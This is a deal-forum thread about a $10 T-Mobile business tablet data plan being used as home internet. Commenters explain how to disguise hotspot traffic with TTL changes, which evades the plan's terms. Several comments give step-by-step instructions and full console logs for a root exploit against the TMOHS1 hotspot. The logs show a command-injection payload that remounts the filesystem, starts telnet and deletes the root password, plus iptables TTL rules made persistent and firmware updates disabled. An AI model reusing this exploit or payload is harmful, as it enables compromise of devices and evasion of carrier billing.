T-Mobile Business = 877-347-2127 If you're having problems.
Internal T-Mobile's plan names:
"Bus Unl Tablet 10 GB HS TE" = Taxes and fees extra. SOC code ZB10HSTE
"Bus Unl Tablet 10 GB HS TI" = Taxes and fees included. SOC code ZB10HSTI
For adding HD Video Pass use SOC code : HDVPASS0
Who's eligible
- Available to new lines of service only. No voice line requirement.
- US and Puerto Rico (SJP) Business customers.
- Tax Exclusive Plan: B/C, B/L, B/M, B/N, B/O, B/P, I/S.
- Tax Inclusive Plan: B/C, B/L, B/N, B/P, I/S, Both TI and TE $10 Unlimited Tablet Promo Plan included within the following SOC Groups: 5, 9, 9A, 10, 10B, 21, 22, 34, 41, 59, and 67.
- Government account types
- Consumer customers
- Cannot be combined with tax included plans.
- Retired features and promotional lines/service credit offers will be removed upon switching to this plan.
- Tax Exclusive plans only eligible to Tax Exclusive BANS
- Tax Inclusive plans only eligible to Tax Inclusive BANS
- Voice line not required
- No migrations
- There is no annual contract (Un-contract) or activation fee.
- These plans do not include Music Freedom, Binge On, or Data Stash.
- All on-network data used counts towards fair-use de-prioritization limits.
Not available
- AVD
- Netflix on Us
- $40 Voice + Tablet credit.
- $5 AutoPay bill credit ($5 per line, up to 8 lines / $40 max credit). See the page for more details.
From this post
The multiple ways of using this $10 line for home internet are:
1. T-Mobile Gateway + Cudy N300 or X6 which are wifi only routers to mask hotspot usage with TTL set on the external wifi router. You can use other wifi routers for this purpose but there's a menu page in the Cudy routers which makes setting TTL easy - Courtesy waterchange
1.1 Cudy router like Cudy LT500 or LT18 or the 5G P8 work as a single device with modem + wifi router. Work well for home internet. Nice thing about the Cudy modems is easy TTL (and imei magic if necessary). - Courtesy waterchange
2. M2100 hotspot device - Hit or a miss - native out of the box but less reliable
3. Orbic 5G hotspot device - more reliable than the m2100, however some people have reported throttling after 1st couple of months
4. Gateway + Project Genesis - works most reliably
5. TMOHS1 - ~ 30-50 mbps out of the box, no TTL update required
6. Tmobile Franklin - ~30-50 mbps with TTL update - the most reliable as of right now, however limited speed.
7. M2000 won't pull data from anywhere.
8. GL.iNET Spitz GL-X3000NR easier to use than Cudy and better performance but expensive. Great form factor and performance. Presets for T-Mobile TTL settings and advanced cell features like tower/band lock. External antennas.
9. M3000B works out of the box with T-Mobile version. Has battery preservation features and ethernet port. Some users say to switch 5G mode to NSA if the hotspot restarts frequently in your area.
Add/update if you have more/better info.
Leave a Comment
Top Comments
They will still lock you to a 2 year EIP even if it's free (They'll make a monthly credit to cover the tablet EIP)
Meaning you'd end up paying $10 for 2 years ($240) for a $129 tablet.
So if you're only doing it for the tablet then it's not worth it
soc code ZB10HSTI is the one you want.
5,731 Comments
Sign up for a Slickdeals account to remove this ad.
The python command in PowerShell is just to check if you have python installed (from what I understood)
Download the zip file from https://github.com/parker-stephen...s/main.zip and unzip it.
however, clicked on it doesnt do a thing ? or i can go here to download all the file into 1 folder ?
https://github.com/parker-stephen...ot-Utility
then use cd to get to file location ? but then i kept getting syntaxerror: invalid syntax
I'm not technical enough to do these hacks
Download the zip file from https://github.com/parker-stephen...s/main.zip and unzip it.
however, clicked on it doesnt do a thing ? or i can go here to download all the file into 1 folder ?
https://github.com/parker-stephen...ot-Utility [github.com]
then use cd to get to file location ? but then i kept getting syntaxerror: invalid syntax
I am attaching Screenshot
Download the zip file from https://github.com/parker-stephen...s/main.zip and unzip it.
however, clicked on it doesnt do a thing ? or i can go here to download all the file into 1 folder ?
https://github.com/parker-stephen...ot-Utility
then use cd to get to file location ? but then i kept getting syntaxerror: invalid syntax
pip install -r requirements.txt
You will see certain kind of messages confirming if it works; Just sharing my experience
0. I used Mac terminal
1. I needed to update/upgrade my pip to make it install (google for command)
2. I needed to use "python3" instead of "python " to make it run in the next step
before powershell, are we suppose to connect to tmohs1 via wifi or usb to desktop first? or run putty ? i wish theres a video that shows all these from beginning to the end
To hack the TMOHS1:
THESE ARE THE ORIGINAL INSTRUCTIONS FROM THIS THREAD:
Windows Instructions
1. Open Powershell (Search Powershell).
2. type
Code:
python
to check installed or not (If its not installed, windows will open app store download it, once the download is completed type python to make sure its installed).
3. Download the zip file from https://github.com/parker-stephen...s/main.zip and unzip it.
4. go to unzipped location in powershell using cd.
5. install the requirements by executing command:
Code:
pip install -r requirements.txt
6. then run the bellow command follow the prompts.
C:\Users\<login>\Downloads\TMOHS1-Root-Utility-main>python ./rootScript.py -v
Verbose mode enabled.
Enter your weblogin password:
Encrypting the login payload with key "abcdefghijklmn12" [yes, that's really the key]. . .
Sending the authentication request. . .
Received authentication token from hotspot: 876876876
Response: {'result': '0', 'ip': '0.0.0.0', 'timeout': '000300', 'token': '9879898'}
Exploiting qcmap_web_cgi. . .
Connection to device may reset. If you are running the exploit via WiFi,
ensure that your device reconnects to the hotspot's network.
Payload is ready: page=savepowersaving&displaytimeout=undefined&wifistandby=10;$(mount -o remount,rw /; telnetd; passwd -d root)&token=987987978
Sending the payload now!
Waiting for socket. . .
If you are running the exploit wirelessly, the connection may drop.
Remember to reconnect to your hotspot's WiFi once it reappears.
This may take up to a minute.
Connected! Socket says: {'commit': 'Socket TimeOut'}
Remounted root filesystem r/w. . .
Removed root password. . .
Enabling telnet. . .
Trying to connect via telnet. . .
Received:
mdm 987987987 mdm9607
mdm9607 login:
Telnet connection initialized.
Logging in as root with empty password, please wait. . .
Waiting for login to be processed. . .
The exploit removed the root password of your device. It is STRONGLY recommended to set a custom root password.
Your device will be EXTREMELY INSECURE if you do not.
Would you like to set a custom root password? (Y/n):
y
Changing root password.
IMPORTANT NOTE: the password will be sent insecurely over telnet,
so you should manually change it later over ADB-USB if you are concerned about security.
Sent command via telnet: passwd root
Enter new password:
Confirm new password:
Root password successfully updated.
### Options ###
1) Change root password
2) Enough with this script BS, give me a shell!
3) Enable ADB
4) Enable ADB - Persistent through reboot (somewhat experimental)
5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
7) Enable mood lighting (look at the battery LED)
8) Mask hotspot data as "on-device" data
9) Reboot
10) Quit
Enter option: 8
Sent command via telnet: echo "iptables -t mangle -I POSTROUTING -o rmnet_data0 -j TTL --ttl-set 64" > /etc/init.d/ttl.sh; echo "ip6tables -t mangle -I POSTROUTING -o rmnet_data0 -j HL --hl-set 64" >> /etc/init.d/ttl.sh; chmod 755 /etc/init.d/ttl.sh; ln -s /etc/init.d/ttl.sh /etc/rc5.d/S98ttl
Added TTL rules to mask hotspot data as normal "on-device" data. Will take affect on reboot.
### Options ###
1) Change root password
2) Enough with this script BS, give me a shell!
3) Enable ADB
4) Enable ADB - Persistent through reboot (somewhat experimental)
5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
7) Enable mood lighting (look at the battery LED)
8) Mask hotspot data as "on-device" data
9) Reboot
10) Quit
Enter option: 9
Rebooting. Goodbye!
Sent command via telnet: reboot
_______________________________________________________________________________
This is the first step I did:
SUCCESSFUL PIP:
_______________________________________________________________________________
Suggestion [3,General]: The command \pip was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type: ".\\pip". See "get-help about_Command_Precedence" for more details.
PS D:\TMOHS1_Root_Utility> .\pip install -r requirements.txt
Collecting cryptography==36.0.1
Downloading cryptography-36.0.1-cp36-abi3-win_amd64.whl (2.2 MB)
---------------------------------------- 2.2/2.2 MB 1.6 MB/s eta 0:00:00
Collecting requests==2.26.0
Downloading requests-2.26.0-py2.py3-none-any.whl (62 kB)
---------------------------------------- 62.3/62.3 kB 1.7 MB/s eta 0:00:00
Collecting cffi>=1.12
Downloading cffi-1.15.1-cp310-cp310-win_amd64.whl (179 kB)
---------------------------------------- 179.1/179.1 kB 2.2 MB/s eta 0:00:00
Collecting certifi>=2017.4.17
Downloading certifi-2022.6.15-py3-none-any.whl (160 kB)
---------------------------------------- 160.2/160.2 kB 1.6 MB/s eta 0:00:00
Collecting idna<4,>=2.5
Downloading idna-3.3-py3-none-any.whl (61 kB)
---------------------------------------- 61.2/61.2 kB 1.6 MB/s eta 0:00:00
Collecting charset-normalizer~=2.0.0
Downloading charset_normalizer-2.0.12-py3-none-any.whl (39 kB)
Collecting urllib3<1.27,>=1.21.1
Downloading urllib3-1.26.11-py2.py3-none-any.whl (139 kB)
---------------------------------------- 139.9/139.9 kB 2.8 MB/s eta 0:00:00
Collecting pycparser
Downloading pycparser-2.21-py2.py3-none-any.whl (118 kB)
---------------------------------------- 118.7/118.7 kB 2.3 MB/s eta 0:00:00
Installing collected packages: urllib3, pycparser, idna, charset-normalizer, certifi, requests, cffi, cryptography
WARNING: The script normalizer.exe is installed in 'C:\Users\WIN_8\AppData\Local\Programs\Python\Python310\Scripts' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
Successfully installed certifi-2022.6.15 cffi-1.15.1 charset-normalizer-2.0.12 cryptography-36.0.1 idna-3.3 pycparser-2.21 requests-2.26.0 urllib3-1.26.11
_________________________________________________________________________________
This is the second step I did:
SUCCESSFUL ROOT:
_________________________________________________________________________________
PS C:\Users\WIN_8\AppData\Local\Programs\Python\Python310> py ./rootScript.py -v
Verbose mode enabled.
Enter your weblogin password:
Encrypting the login payload with key "abcdefghijklmn12" [yes, that's really the key]. . .
Sending the authentication request. . .
Received authentication token from hotspot: 5e220dc8a59ac3ab
Response: {'result': '0', 'ip': '0.0.0.0', 'timeout': '060000', 'token': '5e220dc8a59ac3ab'}
Exploiting qcmap_web_cgi. . .
Connection to device may reset. If you are running the exploit via WiFi,
ensure that your device reconnects to the hotspot's network.
Payload is ready: page=savepowersaving&displaytimeout=undefined&wifistandby=10;$(mount -o remount,rw /; telnetd; passwd -d root)&token=5e220dc8a59ac3ab
Sending the payload now!
Waiting for socket. . .
If you are running the exploit wirelessly, the connection may drop.
Remember to reconnect to your hotspot's WiFi once it reappears.
This may take up to a minute.
Connected! Socket says: {'result': 'success', 'displaytimeout': '0', 'wifistandby': '10'}
Remounted root filesystem r/w. . .
Removed root password. . .
Enabling telnet. . .
Trying to connect via telnet. . .
Received:
mdm 202012112010 mdm9607
mdm9607 login:
Telnet connection initialized.
Logging in as root with empty password, please wait. . .
Waiting for login to be processed. . .
The exploit removed the root password of your device. It is STRONGLY recommended to set a custom root password.
Your device will be EXTREMELY INSECURE if you do not.
Would you like to set a custom root password? (Y/n):
y
Changing root password.
IMPORTANT NOTE: the password will be sent insecurely over telnet,
so you should manually change it later over ADB-USB if you are concerned about security.
Sent command via telnet: passwd root
Enter new password:
Confirm new password:
Root password successfully updated.
### Options ###
1) Change root password
2) Enough with this script BS, give me a shell!
3) Enable ADB
4) Enable ADB - Persistent through reboot (somewhat experimental)
5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
7) Enable mood lighting (look at the battery LED)
8) Mask hotspot data as "on-client-device" data
9) Reboot
10) Quit
Enter option: 8
Sent command via telnet: echo "iptables -t mangle -I POSTROUTING -o rmnet_data+ -j TTL --ttl-set 64" > /etc/init.d/ttl.sh; echo "ip6tables -t mangle -I POSTROUTING -o rmnet_data+ -m hl ! --hl-eq 255 -j HL --hl-set 64" >> /etc/init.d/ttl.sh; chmod 755 /etc/init.d/ttl.sh; ln -s /etc/init.d/ttl.sh /etc/rc5.d/S98ttl
Added TTL rules to mask hotspot data as normal "on-device" data. Will take effect on reboot.
### Options ###
1) Change root password
2) Enough with this script BS, give me a shell!
3) Enable ADB
4) Enable ADB - Persistent through reboot (somewhat experimental)
5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
7) Enable mood lighting (look at the battery LED)
8) Mask hotspot data as "on-client-device" data
9) Reboot
10) Quit
Enter option: 6
Sent command via telnet: if [ ! -d /etc/backups/init.d ];then mkdir -p /etc/backups/init.d; fi; cp /etc/init.d/start_omadm_le /etc/backups/init.d/; rm /etc/init.d/start_omadm_le;
Received: if [ ! -d /etc/backups/init.d ];then mkdir -p /etc/backups/init.d; fi; cp /e
tc/init.d/start_omadm_le /etc/backups/init.d/; rm /etc/init.d/start_omadm_le;
~ #
Succesfully removed OMA-DM bootstrap, if one was present.
### Options ###
1) Change root password
2) Enough with this script BS, give me a shell!
3) Enable ADB
4) Enable ADB - Persistent through reboot (somewhat experimental)
5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
7) Enable mood lighting (look at the battery LED)
8) Mask hotspot data as "on-client-device" data
9) Reboot
10) Quit
Enter option: 9
Rebooting. Goodbye!
Sent command via telnet: reboot
PS C:\Users\WIN_8\AppData\Local\Programs\Python\Python310>
_________________________________________________________________________________
Was done on Win 11 not Win 8.
Used:
python-3.10.6-amd64.exe
Those who got the tablet and the Sim, is the text working?
Can you send and receive texts?
In my tablet texts worked for about a week and then no more.
This unlimited internet data plan also has unlimited texts.
Called T-Mo tech support and they have no idea what's going on, but it was confirmed that this plan has the unlimited texts.
It has to have texts for the receipt of any security pins.
The same issue happens in a friend's tablet.
Sign up for a Slickdeals account to remove this ad.
Those who got the tablet and the Sim, is the text working?
Can you send and receive texts?
In my tablet texts worked for about a week and then no more.
This unlimited internet data plan also has unlimited texts.
Called T-Mo tech support and they have no idea what's going on, but it was confirmed that this plan has the unlimited texts.
It has to have texts for the receipt of any security pins.
The same issue happens in a friend's tablet.
They're looking into it.
But as I said, the friend's tablet has the same text problem, so it must be a T-Mo issue.
Just trying to see if anyone here has the same text problem with the tablet.
Sign up for a Slickdeals account to remove this ad.
Does not require any high-tech hacking skills, you're not hacking a CIA server, it's very easy with easy instructions, and you have free and fully portable unlimited data hotspot!
Leave a Comment